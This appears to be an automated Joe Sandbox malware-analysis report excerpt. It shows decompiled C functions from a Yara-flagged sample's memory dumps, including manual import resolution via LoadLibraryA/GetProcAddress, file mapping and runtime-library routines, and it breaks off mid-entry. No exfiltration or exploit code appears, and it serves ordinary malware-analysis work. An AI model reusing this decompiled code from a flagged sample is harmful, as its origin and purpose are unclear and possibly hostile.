                                                                                • API String ID: 2343611727-0
                                                                                • Opcode ID: 9a26f8863223528a8ba9dc4884003ad9a270d8428d444be22dc5fe37b6817259
                                                                                • Instruction ID: ba4459478a599cfadc9b88684c03bf1d21f6774d6f14acb406a39b5e284c0b53
                                                                                • Opcode Fuzzy Hash: 9a26f8863223528a8ba9dc4884003ad9a270d8428d444be22dc5fe37b6817259
                                                                                • Instruction Fuzzy Hash: 1F51A1B5E002199FDB10EFB8C9819EEB7B4FF49314B10452BE121A7291D738A985CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E00402EF4(void* __esi) {
                                                                                				signed short* _v8;
                                                                                				struct HINSTANCE__* _v12;
                                                                                				signed short _v16;
                                                                                				void* __edi;
                                                                                				intOrPtr _t34;
                                                                                				intOrPtr _t36;
                                                                                				signed short _t37;
                                                                                				signed short _t38;
                                                                                				intOrPtr _t40;
                                                                                				signed short _t42;
                                                                                				CHAR* _t43;
                                                                                				_Unknown_base(*)()* _t44;
                                                                                				signed int _t45;
                                                                                				signed int _t48;
                                                                                				signed short _t55;
                                                                                				signed short _t60;
                                                                                				void* _t64;
                                                                                				signed short _t67;
                                                                                				signed short _t69;
                                                                                				void* _t70;
                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                
                                                                                				_t70 = __esi;
                                                                                				_t34 =  *((intOrPtr*)(__esi + 0xc0));
                                                                                				_t72 = _t71 - 0xc;
                                                                                				if(_t34 != 0 &&  *((intOrPtr*)(__esi + 0xc4)) != 0) {
                                                                                					_t55 =  *((intOrPtr*)(__esi + 0x144)) + _t34;
                                                                                					while(1) {
                                                                                						_t36 =  *((intOrPtr*)(_t55 + 0xc));
                                                                                						if(_t36 == 0) {
                                                                                							goto L24;
                                                                                						}
                                                                                						_t37 = LoadLibraryA( *((intOrPtr*)(_t70 + 0x144)) + _t36);
                                                                                						_v12 = _t37;
                                                                                						__eflags = _t37;
                                                                                						if(_t37 == 0) {
                                                                                							L26:
                                                                                							_push(6);
                                                                                							goto L27;
                                                                                						} else {
                                                                                							_t38 =  *(_t70 + 0x154);
                                                                                							__eflags =  *(_t70 + 0x150) - _t38;
                                                                                							if( *(_t70 + 0x150) < _t38) {
                                                                                								_t67 = _v16;
                                                                                								goto L13;
                                                                                							} else {
                                                                                								__eflags = _t38;
                                                                                								if(_t38 == 0) {
                                                                                									_t45 = 0x10;
                                                                                								} else {
                                                                                									_t45 = _t38 + _t38;
                                                                                								}
                                                                                								 *(_t70 + 0x154) = _t45;
                                                                                								_t67 = E0041E042(_t64, _t69, _t70, _t45 << 2);
                                                                                								_v16 = _t67;
                                                                                								__eflags = _t67;
                                                                                								if(_t67 == 0) {
                                                                                									_push(3);
                                                                                									goto L27;
                                                                                								} else {
                                                                                									_t48 =  *(_t70 + 0x150);
                                                                                									__eflags = _t48;
                                                                                									if(_t48 != 0) {
                                                                                										__eflags = _t48 << 2;
                                                                                										E00421230(_t67,  *(_t70 + 0x14c), _t48 << 2);
                                                                                										_t72 = _t72 + 0xc;
                                                                                									}
                                                                                									E0041E008( *(_t70 + 0x14c));
                                                                                									 *(_t70 + 0x14c) = _t67;
                                                                                									L13:
                                                                                									 *((intOrPtr*)(_t67 +  *(_t70 + 0x150) * 4)) = _v12;
                                                                                									 *(_t70 + 0x150) =  *(_t70 + 0x150) + 1;
                                                                                									_t40 =  *((intOrPtr*)(_t70 + 0x144));
                                                                                									_t69 =  *((intOrPtr*)(_t55 + 0x10)) + _t40;
                                                                                									__eflags =  *(_t55 + 4);
                                                                                									_v8 = _t69;
                                                                                									if( *(_t55 + 4) == 0) {
                                                                                										goto L21;
                                                                                									} else {
                                                                                										_t60 =  *_t55;
                                                                                										__eflags = _t60;
                                                                                										if(_t60 == 0) {
                                                                                											_push(8);
                                                                                											L27:
                                                                                											_pop(0);
                                                                                										} else {
                                                                                											_v8 = _t60 + _t40;
                                                                                											while(1) {
                                                                                												L21:
                                                                                												_t42 =  *_v8;
                                                                                												__eflags = _t42;
                                                                                												if(__eflags == 0) {
                                                                                													break;
                                                                                												}
                                                                                												if(__eflags >= 0) {
                                                                                													_t43 = _t42 +  *((intOrPtr*)(_t70 + 0x144)) + 2;
                                                                                												} else {
                                                                                													_t43 = _t42 & 0x0000ffff;
                                                                                												}
                                                                                												_t44 = GetProcAddress(_v12, _t43);
                                                                                												 *_t69 = _t44;
                                                                                												__eflags = _t44;
                                                                                												if(_t44 == 0) {
                                                                                													goto L26;
                                                                                												} else {
                                                                                													_v8 =  &(_v8[2]);
                                                                                													_t69 = _t69 + 4;
                                                                                													__eflags = _t69;
                                                                                													continue;
                                                                                												}
                                                                                												goto L25;
                                                                                											}
                                                                                											_t55 = _t55 + 0x14;
                                                                                											__eflags = _t55;
                                                                                											continue;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						goto L25;
                                                                                					}
                                                                                					goto L24;
                                                                                				}
                                                                                				L25:
                                                                                				return 0;
                                                                                			}


























                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad_free_malloc_memmove
                                                                                • String ID:
                                                                                • API String ID: 2732542392-0
                                                                                • Opcode ID: 21204ec43521b1d0ce1f2020ebcb66b3aced4a8fa59d7f199c40dc3aa222434b
                                                                                • Instruction ID: b0f97d1e2ba6270cb94c2f27e2f8f5c978a14479b632636112cca3c8844dfc58
                                                                                • Opcode Fuzzy Hash: 21204ec43521b1d0ce1f2020ebcb66b3aced4a8fa59d7f199c40dc3aa222434b
                                                                                • Instruction Fuzzy Hash: E0319C75601702EBDB21CF64C944BABBBF8AB44345F14443AE84AE73C4E678E9019B28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E0041C36F(void* __eax, signed int __ecx, long __edi, void* __esi, intOrPtr _a4) {
                                                                                				void* _t32;
                                                                                				void* _t33;
                                                                                				void* _t39;
                                                                                				signed int _t41;
                                                                                				signed int _t43;
                                                                                				signed char _t45;
                                                                                				long _t49;
                                                                                				void* _t50;
                                                                                
                                                                                				_t50 = __esi;
                                                                                				_t49 = __edi;
                                                                                				_t43 = __ecx;
                                                                                				if( *(__esi + 4) != 0 ||  *(__esi + 0xc) != 0 ||  *(__esi + 0x20) != 0 ||  *((intOrPtr*)(__esi + 0x18)) != 0 ||  *((intOrPtr*)(__esi + 0x14)) != 0 ||  *((intOrPtr*)(__esi + 0x2c)) != 0) {
                                                                                					return 0x1000000;
                                                                                				} else {
                                                                                					if(_a4 != 1) {
                                                                                						__eflags = _a4 - 2;
                                                                                						if(__eflags != 0) {
                                                                                							__eflags = _a4 - 3;
                                                                                							if(_a4 != 3) {
                                                                                								return 0x10000;
                                                                                							}
                                                                                							__eflags = __edi;
                                                                                							if(__edi != 0) {
                                                                                								__eflags = __eax;
                                                                                								if(__eax == 0) {
                                                                                									_t32 = CreateFileMappingW(0xffffffff, 0, 4, 0, __edi, 0);
                                                                                									 *(__esi + 0xc) = _t32;
                                                                                									__eflags = _t32;
                                                                                									if(_t32 != 0) {
                                                                                										_t33 = MapViewOfFile(_t32, 0xf001f, 0, 0, __edi);
                                                                                										 *(__esi + 0x20) = _t33;
                                                                                										__eflags = _t33;
                                                                                										if(_t33 != 0) {
                                                                                											L18:
                                                                                											 *((char*)(_t50 + 0x1c)) = 1;
                                                                                											 *((intOrPtr*)(_t50 + 0x24)) = 0;
                                                                                											 *(_t50 + 0x28) = _t49;
                                                                                											L8:
                                                                                											return 0;
                                                                                										}
                                                                                										CloseHandle( *(__esi + 0xc));
                                                                                										 *(__esi + 0xc) = 0;
                                                                                									}
                                                                                									return 0x300;
                                                                                								}
                                                                                								 *(__esi + 0x20) = __eax;
                                                                                								goto L18;
                                                                                							}
                                                                                							return 0x30000;
                                                                                						}
                                                                                						_t39 = CreateFileW(E00419C2F(__eflags, __eax), 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                						 *(__esi + 4) = _t39;
                                                                                						__eflags = _t39 - 0xffffffff;
                                                                                						if(_t39 != 0xffffffff) {
                                                                                							 *(__esi + 0x1c) = 1;
                                                                                							 *(__esi + 0x10) = 0;
                                                                                							 *((char*)(__esi + 8)) = 1;
                                                                                							goto L8;
                                                                                						}
                                                                                						 *(__esi + 4) = 0;
                                                                                						return 0x200;
                                                                                					}
                                                                                					 *(__esi + 4) = __eax;
                                                                                					 *((char*)(__esi + 8)) = 0;
                                                                                					_t41 = SetFilePointer(__eax, 0, 0, 1);
                                                                                					_t45 = _t43 & 0xffffff00 | _t41 != 0xffffffff;
                                                                                					 *(__esi + 0x1c) = _t45;
                                                                                					asm("sbb ecx, ecx");
                                                                                					 *(__esi + 0x10) =  ~(_t45 & 0x000000ff) & _t41;
                                                                                					goto L8;
                                                                                				}
                                                                                			}












                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,0041D2AA,?,00000004,00409A8F,?), ref: 0041C3BA
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041D2AA,?,00000004,00409A8F,?), ref: 0041C3FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreatePointer
                                                                                • String ID:
                                                                                • API String ID: 2024441833-0
                                                                                • Opcode ID: f7d817a8635adb1b2a4b09a9d11919786a18b35ba17e2b49d210922c817dc4a4
                                                                                • Instruction ID: 1eff4128bb8c17c9b75ca74513e4c6c10363b5fc03f10ddc45af2330108476ed
                                                                                • Opcode Fuzzy Hash: f7d817a8635adb1b2a4b09a9d11919786a18b35ba17e2b49d210922c817dc4a4
                                                                                • Instruction Fuzzy Hash: 653164B05887519FD7309F758CD4777BAE8BB18358F10CA2FF19682A81D27898C48B5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E00420AB3(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                                                                				void* _t7;
                                                                                				long _t8;
                                                                                				intOrPtr* _t9;
                                                                                				intOrPtr* _t12;
                                                                                				long _t27;
                                                                                				long _t30;
                                                                                
                                                                                				if(_a4 != 0) {
                                                                                					_push(__esi);
                                                                                					_t30 = _a8;
                                                                                					__eflags = _t30;
                                                                                					if(_t30 != 0) {
                                                                                						_push(__edi);
                                                                                						while(1) {
                                                                                							__eflags = _t30 - 0xffffffe0;
                                                                                							if(_t30 > 0xffffffe0) {
                                                                                								break;
                                                                                							}
                                                                                							__eflags = _t30;
                                                                                							if(_t30 == 0) {
                                                                                								_t30 = _t30 + 1;
                                                                                								__eflags = _t30;
                                                                                							}
                                                                                							_t7 = HeapReAlloc( *0x449158, 0, _a4, _t30);
                                                                                							_t27 = _t7;
                                                                                							__eflags = _t27;
                                                                                							if(_t27 != 0) {
                                                                                								L17:
                                                                                								_t8 = _t27;
                                                                                							} else {
                                                                                								__eflags =  *0x44978c - _t7;
                                                                                								if(__eflags == 0) {
                                                                                									_t9 = E00423E5B(__eflags);
                                                                                									 *_t9 = E00423E19(GetLastError());
                                                                                									goto L17;
                                                                                								} else {
                                                                                									__eflags = E0042482A(_t7, _t30);
                                                                                									if(__eflags == 0) {
                                                                                										_t12 = E00423E5B(__eflags);
                                                                                										 *_t12 = E00423E19(GetLastError());
                                                                                										L12:
                                                                                										_t8 = 0;
                                                                                										__eflags = 0;
                                                                                									} else {
                                                                                										continue;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							goto L14;
                                                                                						}
                                                                                						E0042482A(_t6, _t30);
                                                                                						 *((intOrPtr*)(E00423E5B(__eflags))) = 0xc;
                                                                                						goto L12;
                                                                                					} else {
                                                                                						E0041E008(_a4);
                                                                                						_t8 = 0;
                                                                                					}
                                                                                					L14:
                                                                                					return _t8;
                                                                                				} else {
                                                                                					return E0041E042(__edx, __edi, __esi, _a8);
                                                                                				}
                                                                                			}










                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 00420AC1
                                                                                  • Part of subcall function 0041E042: __FF_MSGBANNER.LIBCMT ref: 0041E05B
                                                                                  • Part of subcall function 0041E042: __NMSG_WRITE.LIBCMT ref: 0041E062
                                                                                  • Part of subcall function 0041E042: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00402F66,00000010), ref: 0041E087
                                                                                • _free.LIBCMT ref: 00420AD4
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free_malloc
                                                                                • String ID:
                                                                                • API String ID: 1020059152-0
                                                                                • Opcode ID: 313411e567a504e90aaf4b428f65e1b85b5cdf5dbe1de00aeaa4a50b97d5d91e
                                                                                • Instruction ID: 08f9d9b0e77d6452fabf12e62ecdd3381a7805b645ad4c3961844af03e51d9a5
                                                                                • Opcode Fuzzy Hash: 313411e567a504e90aaf4b428f65e1b85b5cdf5dbe1de00aeaa4a50b97d5d91e
                                                                                • Instruction Fuzzy Hash: 6011B636700635AFCF316FB5B80465B3BE49F413A9B91442BF84997252DE3C9D41869C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E0040F445(CHAR* _a4, CHAR* _a8) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				int _t7;
                                                                                				CHAR* _t8;
                                                                                				CHAR* _t9;
                                                                                				CHAR* _t12;
                                                                                				int _t15;
                                                                                				int _t16;
                                                                                				void* _t17;
                                                                                				CHAR* _t18;
                                                                                				CHAR** _t19;
                                                                                				void* _t21;
                                                                                				CHAR* _t22;
                                                                                				CHAR** _t23;
                                                                                				int _t24;
                                                                                				CHAR* _t26;
                                                                                
                                                                                				_t7 = lstrlenA(_a4);
                                                                                				_t22 = _a8;
                                                                                				_t24 = _t7;
                                                                                				_t8 = _t22;
                                                                                				if(_t22 != 0) {
                                                                                					_t19 =  &_a8;
                                                                                					do {
                                                                                						_t16 = lstrlenA(_t8);
                                                                                						_t19 =  &(_t19[1]);
                                                                                						_t24 = _t24 + _t16;
                                                                                						_t8 =  *_t19;
                                                                                						_t28 = _t8;
                                                                                					} while (_t8 != 0);
                                                                                				}
                                                                                				_t9 = E0041D474(_t17, _t21, _t22, _t24 + 1, _t28, _t24 + 1);
                                                                                				_t18 = _t9;
                                                                                				 *0x44a220(_t18, _a4);
                                                                                				_t26 =  &(_t18[lstrlenA(_t18)]);
                                                                                				_t12 = _t22;
                                                                                				if(_t22 != 0) {
                                                                                					_t23 =  &_a8;
                                                                                					do {
                                                                                						 *0x44a220(_t26, _t12);
                                                                                						_t15 = lstrlenA(_t26);
                                                                                						_t23 =  &(_t23[1]);
                                                                                						_t26 =  &(_t26[_t15]);
                                                                                						_t12 =  *_t23;
                                                                                					} while (_t12 != 0);
                                                                                				}
                                                                                				return _t18;
                                                                                			}





















                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000104,00000000,014A06E0,?,?,00413C88,00000000,00440C68,014A06E0,00000000,014A10F8,00000104,00413E0B), ref: 0040F44E
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 0040F463
                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 0040F482
                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040F489
                                                                                • lstrcpy.KERNEL32(00000001,?), ref: 0040F49D
                                                                                • lstrlenA.KERNEL32(00000001,?,?,?,?,?,?), ref: 0040F4A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcpy
                                                                                • String ID:
                                                                                • API String ID: 805584807-0
                                                                                • Opcode ID: c0520812aa2ba09dd322cf99fd8be3b8f93583b023992963ce0cfb3f49bdd848
                                                                                • Instruction ID: 85f67f6f1b018092bdea60e2615b28a2843bab97769f3ac34907459ecdd801eb
                                                                                • Opcode Fuzzy Hash: c0520812aa2ba09dd322cf99fd8be3b8f93583b023992963ce0cfb3f49bdd848
                                                                                • Instruction Fuzzy Hash: 4601B17B2002146FDB108F28EC48D6B7B68EF493687050131FD09E3311D739DE158A99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 00C78995
                                                                                  • Part of subcall function 00C771DA: __getptd_noexit.LIBCMT ref: 00C771DD
                                                                                  • Part of subcall function 00C771DA: __amsg_exit.LIBCMT ref: 00C771EA
                                                                                • __amsg_exit.LIBCMT ref: 00C789B5
                                                                                • __lock.LIBCMT ref: 00C789C5
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00C789E2
                                                                                • InterlockedIncrement.KERNEL32(02FC2CB0), ref: 00C78A0D
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                • String ID:
                                                                                • API String ID: 4271482742-0
                                                                                • Opcode ID: 8805252bcb0aaeb21f3ed07ba593440fc71808a3cba6de357165f85efaefb2a8
                                                                                • Instruction ID: c4438492ca2b06f7a5c48fc833c0ccafc3146d7d3bf47c569292ddf3bb282106
                                                                                • Opcode Fuzzy Hash: 8805252bcb0aaeb21f3ed07ba593440fc71808a3cba6de357165f85efaefb2a8
                                                                                • Instruction Fuzzy Hash: 6B01DB31D41B119BDB24AF759809B6D77A0BF01731F088215EA28B3390CF74A945EFD2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __lock.LIBCMT ref: 00C71C0B
                                                                                  • Part of subcall function 00C73FBC: __mtinitlocknum.LIBCMT ref: 00C73FD2
                                                                                  • Part of subcall function 00C73FBC: __amsg_exit.LIBCMT ref: 00C73FDE
                                                                                  • Part of subcall function 00C73FBC: EnterCriticalSection.KERNEL32(00C71E80,00C71E80,?,00C75AF0,00000004,00DAAC10,0000000C,00C78EA1,00000000,00C71E8F,00000000,00000000,00000000,?,00C7718C,00000001), ref: 00C73FE6
                                                                                • ___sbh_find_block.LIBCMT ref: 00C71C16
                                                                                • ___sbh_free_block.LIBCMT ref: 00C71C25
                                                                                • HeapFree.KERNEL32(00000000,00000000,00DAAAF0,0000000C,00C73F9D,00000000,00DAABD0,0000000C,00C73FD7,00000000,00C71E80,?,00C75AF0,00000004,00DAAC10,0000000C), ref: 00C71C55
                                                                                • GetLastError.KERNEL32(?,00C75AF0,00000004,00DAAC10,0000000C,00C78EA1,00000000,00C71E8F,00000000,00000000,00000000,?,00C7718C,00000001,00000214), ref: 00C71C66
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 2714421763-0
                                                                                • Opcode ID: 602fc02b5f7ff56b19f13b7e922164f6aa5d921c5da4bc6ff4f36334c4b4dec2
                                                                                • Instruction ID: c0dc9e20cd85a8cbcdb548aa9a86617f45050aa0170120427b4f2554236d1ffe
                                                                                • Opcode Fuzzy Hash: 602fc02b5f7ff56b19f13b7e922164f6aa5d921c5da4bc6ff4f36334c4b4dec2
                                                                                • Instruction Fuzzy Hash: 9001A231844341AADF357FF99C0AB5E7BA49F01761F18C109FD2DA6191DB788A80EA54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0040F003(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t37;
                                                                                				void* _t38;
                                                                                
                                                                                				_t35 = __edi;
                                                                                				_push(0xc);
                                                                                				E00421975(E00435B74, __ebx, __edi, __esi);
                                                                                				_t37 =  *((intOrPtr*)(_t38 + 8));
                                                                                				E0041D582(_t37, 0);
                                                                                				 *((intOrPtr*)(_t38 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t37 + 4)) = 0;
                                                                                				 *((char*)(_t37 + 8)) = 0;
                                                                                				 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                                                                				 *((char*)(_t37 + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t37 + 0x14)) = 0;
                                                                                				 *((char*)(_t37 + 0x18)) = 0;
                                                                                				 *((intOrPtr*)(_t37 + 0x1c)) = 0;
                                                                                				 *((char*)(_t37 + 0x20)) = 0;
                                                                                				 *((char*)(_t38 - 4)) = 4;
                                                                                				_t40 =  *(_t38 + 0xc);
                                                                                				if( *(_t38 + 0xc) == 0) {
                                                                                					 *(_t38 + 0xc) = "bad locale name";
                                                                                					E0041E15E(_t38 - 0x18, _t38 + 0xc);
                                                                                					 *((intOrPtr*)(_t38 - 0x18)) = 0x4382f8;
                                                                                					E00421126(_t38 - 0x18, 0x444218);
                                                                                				}
                                                                                				E0041D8D9(0, _t35, _t37, _t40, _t37,  *(_t38 + 0xc));
                                                                                				return E00421A4D(_t37);
                                                                                			}






                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0040F00A
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040F017
                                                                                • std::exception::exception.LIBCMT ref: 0040F04E
                                                                                  • Part of subcall function 0041E15E: std::exception::_Copy_str.LIBCMT ref: 0041E179
                                                                                • __CxxThrowException@8.LIBCMT ref: 0040F063
                                                                                  • Part of subcall function 00421126: RaiseException.KERNEL32(0040404E,?,N@@,?,?,?,?,?,0040404E,?,hAD,00000000), ref: 00421168
                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040F06C
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Copy_strExceptionException@8H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 637683493-0
                                                                                • Opcode ID: 707634a921c0c10fd2f33e892302f4a4a7c9a1a0539888a80e497f1c097a9c5c
                                                                                • Instruction ID: 351f9480eb81dbd4ede676fc091eb4fa21244b21298f4da9ee5b39182e7784d1
                                                                                • Opcode Fuzzy Hash: 707634a921c0c10fd2f33e892302f4a4a7c9a1a0539888a80e497f1c097a9c5c
                                                                                • Instruction Fuzzy Hash: 110171B1941744EEC721EF5A808148EFFE0BF28314B80C56FF59A57641C738A648CB9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 90%
                                                                                			E0042793D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				signed int _t12;
                                                                                				void* _t28;
                                                                                				intOrPtr _t29;
                                                                                				void* _t30;
                                                                                				void* _t31;
                                                                                
                                                                                				_t31 = __eflags;
                                                                                				_t26 = __edi;
                                                                                				_t25 = __edx;
                                                                                				_t20 = __ebx;
                                                                                				_push(0xc);
                                                                                				_push(0x443ec8);
                                                                                				E00424400(__ebx, __edi, __esi);
                                                                                				_t28 = E00427B66(__edx, __edi, _t31);
                                                                                				_t12 =  *0x447bf0; // 0xfffffffe
                                                                                				if(( *(_t28 + 0x70) & _t12) == 0) {
                                                                                					L6:
                                                                                					E00429078(0xc);
                                                                                					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                                                					_t29 = _t28 + 0x6c;
                                                                                					 *((intOrPtr*)(_t30 - 0x1c)) = E004278F0(_t29,  *0x447e38);
                                                                                					 *(_t30 - 4) = 0xfffffffe;
                                                                                					E004279AA();
                                                                                				} else {
                                                                                					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                						goto L6;
                                                                                					} else {
                                                                                						_t29 =  *((intOrPtr*)(E00427B66(__edx, _t26, _t33) + 0x6c));
                                                                                					}
                                                                                				}
                                                                                				_t34 = _t29;
                                                                                				if(_t29 == 0) {
                                                                                					E004243E2(_t20, _t25, _t26, _t29, _t34, 0x20);
                                                                                				}
                                                                                				return E00424445(_t29);
                                                                                			}









                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 00427949
                                                                                  • Part of subcall function 00427B66: __getptd_noexit.LIBCMT ref: 00427B69
                                                                                  • Part of subcall function 00427B66: __amsg_exit.LIBCMT ref: 00427B76
                                                                                • __getptd.LIBCMT ref: 00427960
                                                                                • __amsg_exit.LIBCMT ref: 0042796E
                                                                                • __lock.LIBCMT ref: 0042797E
                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00427992
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                • String ID:
                                                                                • API String ID: 938513278-0
                                                                                • Opcode ID: b74019e941badcc367a1999a771556c98f961c38dd32cdfea6873b8bb65c1eda
                                                                                • Instruction ID: e8c6be1ed61c114043ad7cb55415433062d12361f1126b0585603bfae2aa802c
